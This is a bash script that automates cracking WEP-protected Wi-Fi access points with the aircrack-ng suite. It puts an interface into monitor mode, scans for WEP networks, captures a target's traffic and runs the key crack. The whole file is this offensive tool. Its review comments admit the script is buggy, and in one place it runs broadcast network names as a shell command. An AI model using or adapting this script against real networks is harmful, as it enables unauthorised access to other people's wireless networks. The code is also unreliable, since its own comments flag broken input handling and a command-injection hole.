# Working files used by the functions below. All three are fixed, relative
# names, so they are created in (and later read from) whatever directory the
# script is started in.

# Screen output of the scan, appended to by scan_access_point.
TMP_AIRODUMP_FILE='airodump.tmp'

# Capture file name handed to airodump-ng and aircrack-ng.
TMP_CAPTURE_FILE='wep_captured.cap'

# Declared here; no function in this listing reads or writes it.
TMP_CRACK_RESULT='crack_result.tmp'
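#######################################
# Clear the terminal and print the program banner.
# Arguments: none
# Outputs:   three banner lines on stdout, each followed by a blank line
# Returns:   status of printf (0 on success)
#######################################
header() {
  clear

  local rule='========================================'

  # printf instead of echo "...\n": whether echo expands "\n" depends on the
  # shell (bash prints it literally unless -e or xpg_echo is set), so the
  # blank line after each banner row is produced by the format string here.
  printf '%s\n\n' "$rule" 'WEP encrypted Wi-Fi Access Point Cracker' "$rule"
}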
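#######################################
# Delete the working files left behind by earlier runs, if they exist.
# Globals:   TMP_AIRODUMP_FILE (read), TMP_CAPTURE_FILE (read)
# Arguments: none
# Returns:   0 unless rm fails on an existing file
# Note:      no call site for this function is visible in this listing, so
#            scan output and captured traffic stay on disk between runs
#            unless a caller invokes it.
#######################################
cleanup() {
  local stale

  # The previous version tested for the capture file but then removed the
  # scan file a second time, so the capture file was never deleted. Looping
  # over both names keeps the test and the removal on the same path.
  for stale in "$TMP_AIRODUMP_FILE" "$TMP_CAPTURE_FILE"; do
    # Skip an empty name: an unquoted, empty operand made `[ -e ]` succeed
    # and ran rm with no arguments.
    if [ -n "$stale" ] && [ -e "$stale" ]; then
      rm -f -- "$stale"
    fi
  done
}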
#######################################
# Show the main menu, read the user's choice and run the matching workflow.
# Globals:   user_option (written); interface, access_point_bssid,
#            access_point_channel (read; assigned by the helpers called here)
# Calls:     find_wifi_interface, start_interface_in_monitor_mode, header,
#            scan_access_point, capture_data, crack_access_point
# Arguments: none
# Any input other than 1, 2 or 3 matches no branch: the function returns
# without printing a message.
#######################################
select_options() {
# NOTE(review): these echo calls have no -e, so whether "\n" becomes a newline
# or is printed literally depends on the shell running the script.
echo "[!] Please select an option below to get started.\n\n"
echo "1) Scan access points nearby and crack"
echo "2) Crack access point with BSSID"
echo "3) Crack previously captured data (if any)"
echo "\nEnter your option: "
read user_option
# Interface discovery and the switch to monitor mode happen before the choice
# is inspected, so they run for every option, including option 3, which only
# works on a file already on disk.
find_wifi_interface
# $interface is expanded unquoted here and may be a name typed at a prompt.
start_interface_in_monitor_mode $interface
if [[ "$user_option" = "1" ]];
then
header
echo "[+] Scanning nearby access points..."
# scan_access_point lets the user pick a network and assigns the globals
# access_point_bssid and access_point_channel that are passed on below.
scan_access_point $interface
capture_data $interface $access_point_bssid $access_point_channel
crack_access_point
elif [[ "$user_option" = "2" ]];
then
header
# NOTE(review): both reads below are given the expansion of a variable, not a
# variable name; confirm where the typed value actually ends up. No format
# check on the BSSID or channel is visible before they are passed on unquoted.
echo "[!] Enter BSSID of the access point:"
read $access_point_bssid
echo "[!] Enter channel of the access point:"
read $access_point_channel
capture_data $interface $access_point_bssid $access_point_channel
crack_access_point
elif [[ "$user_option" = "3" ]];
then
header
crack_access_point
fi
}
#######################################
# Decide which wireless interface to use and store its name in the global
# `interface`.
# Counts the words awk prints for ifconfig lines containing "wlan":
#   exactly one  -> that name is used automatically
#   two or more  -> the candidates are listed and the user types one
#   none         -> the user is asked to type a name
# Globals:   interface_count (written), interface (written)
# Arguments: none
# Outputs:   progress and prompt text on stdout
# Returns:   status of the last echo or read
#######################################
find_wifi_interface() {
  local candidates

  echo "[+] Looking for interfaces.."
  interface_count=$(ifconfig | awk '/wlan.*/ {print $1}' | wc -w)

  if (( interface_count == 1 )); then
    # Single match: take it without asking.
    interface=$(ifconfig | awk '/wlan.*/ {print $1}')
    echo "[+] Found interface $interface"
    echo "[+] Proceeding with $interface..."
  elif (( interface_count >= 2 )); then
    # Several matches: show them indented by one space and let the user pick.
    echo "[!] Select an interface from:"
    candidates=$(ifconfig | awk '/wlan.*/ {print " " $1}')
    echo "$candidates"
    read interface
  else
    # Nothing matched "wlan": fall back to a manually typed name.
    echo "[!] No interfaces found. Manually enter name of interface:"
    read interface
  fi
}
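#######################################
# Ask airmon-ng to start the given interface, then pause for two seconds.
# Arguments: $1 - interface name (may have been typed by the user)
# Outputs:   none; airmon-ng's stdout is discarded
# Returns:   status of sleep; airmon-ng's own exit status is not checked
# Note:      no matching `airmon-ng stop` is visible in this listing, so the
#            interface is left as airmon-ng configured it when the script ends.
#######################################
start_interface_in_monitor_mode() {
  # Quoted so the name reaches airmon-ng as exactly one argument: unquoted,
  # a value containing spaces or glob characters was split or expanded by the
  # shell before the command ran.
  airmon-ng start "$1" >/dev/null
  sleep 2
}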
#######################################
# Run airodump-ng on the given interface until ENTER is pressed, then build a
# numbered list from the saved output and derive a BSSID and channel from the
# user's selection.
# Globals:   TMP_AIRODUMP_FILE (read), access_points, access_point_name,
#            access_point_details, access_point_bssid,
#            access_point_channel (written)
# Arguments: $1 - interface name
# NOTE(review): several statements below do not obviously do what the
# adjacent comments say (see the notes on each); treat those comments as the
# author's intent rather than verified behaviour.
#######################################
scan_access_point() {
echo "[+] Using $1 to scan for WEP-protected access points.."
echo "[+] Press ENTER to stop scan"
# Run the command in the background and redirect the outputs to both
# the terminal screen and a temporary file (name set in $TMP_AIRODUMP_FILE).
# ">>" appends, so output from an earlier run stays in the file unless the
# file was removed beforehand.
airodump-ng $1 | tee /dev/tty >> $TMP_AIRODUMP_FILE &
# NOTE(review): read is given the expansion of enter_key, not a name.
read $enter_key
# On hitting Enter key, kill the previous process.
# NOTE(review): for a background pipeline bash sets $! to the PID of the last
# stage (tee here) - confirm that airodump-ng itself stops. -9 is SIGKILL,
# which the target cannot catch, so it gets no chance to shut down cleanly.
kill -9 "$!"
clear
# Extract the access point names from the temporary file we just created.
# Assumes field 8 is the encryption type and field 11 the network name in the
# saved screen output - TODO confirm against the airodump-ng version in use.
access_points=`cat $TMP_AIRODUMP_FILE | awk '($8=="WEP") {print NR") "$11}'`
echo "[!] Select an access point:"
# NOTE(review): the backticks run the *contents* of access_points as a command
# and echo that command's output. The contents come from broadcast network
# names, i.e. data the user does not control, so this line places untrusted
# input in command position.
echo `$access_points`
# Let the user select an access point
# NOTE(review): read is given the expansion of access_point_number, not a name.
read $access_point_number
# Extract access point name from the number the user entered in the last step.
# NOTE(review): the awk programs are single-quoted, so $access_point_number
# and $access_point_name are interpreted by awk rather than expanded by the
# shell - confirm these comparisons select the intended row.
access_point_name=`echo $access_points | awk '($1==$access_point_number) {print $2}'`
access_point_details=`cat $TMP_AIRODUMP_FILE | awk '($11==$access_point_name) {print $1, $6}'`
# Extract the BSSID & channel of the access point (first and second word of
# access_point_details).
access_point_bssid=`echo $access_point_details | awk '{print $1}'`
access_point_channel=`echo $access_point_details | awk '{print $2}'`
}
#######################################
# Start airodump-ng in the background for one access point, wait for ENTER,
# then kill it.
# Globals:   TMP_CAPTURE_FILE (read)
# Arguments: $1 - interface name
#            $2 - BSSID
#            Callers also pass a channel as $3; this body does not reference it.
# Outputs:   prompt text on stdout; airodump-ng writes to the terminal itself
#######################################
capture_data() {
# Usage is airodump-ng <interface> -bssid <bssid> -c <channel> -w (filename)
echo "[+] Capturing data from access point. Let the 'Data' exceed 20000"
echo "[!] PRESS ENTER TO STOP CAPTURING.."
# Remove any capture left by an earlier run so old and new data are not mixed.
if [ -e $TMP_CAPTURE_FILE ];
then
echo "Removing old capture file $TMP_CAPTURE_FILE"
rm $TMP_CAPTURE_FILE
fi
# $1 and $2 are expanded unquoted; both can originate from typed input, and no
# validation of either is visible in this listing.
airodump-ng $1 -bssid $2 -w $TMP_CAPTURE_FILE &
# NOTE(review): read is given the expansion of enter_key, not a name.
read $enter_key
# $! is the airodump-ng process started above. -9 is SIGKILL, which cannot be
# caught - NOTE(review): confirm the capture file is complete when the process
# is stopped this way.
kill -9 "$!"
}
#######################################
# Run aircrack-ng on the capture file if it exists; otherwise return to the
# main menu.
# Globals:   TMP_CAPTURE_FILE (read)
# Arguments: none
# Calls:     header, select_options (only when the capture file is missing)
#######################################
crack_access_point() {
echo "Press ENTER to quit cracking.."
if [ -e $TMP_CAPTURE_FILE ];
then
# aircrack-ng runs in the background and writes to the terminal; nothing in
# this function saves its result to a file.
aircrack-ng $TMP_CAPTURE_FILE &
# NOTE(review): read is given the expansion of enter_key, not a name.
read $enter_key
# Stops aircrack-ng with SIGKILL as soon as ENTER is pressed, finished or not.
kill -9 "$!"
else
echo "No previously captured data file available"
# header calls clear, so the message above is wiped from the screen right
# after it is printed.
header
# Re-entering the menu from here nests the calls (select_options ->
# crack_access_point -> select_options ...) and repeats the interface lookup
# and the airmon-ng start on every pass.
select_options
fi
}
# Entry point: draw the banner, then hand control to the interactive menu.
# Nothing here calls cleanup(), and no exit trap is installed, so the working
# files and the interface state are left as they are when the script ends.
header
select_options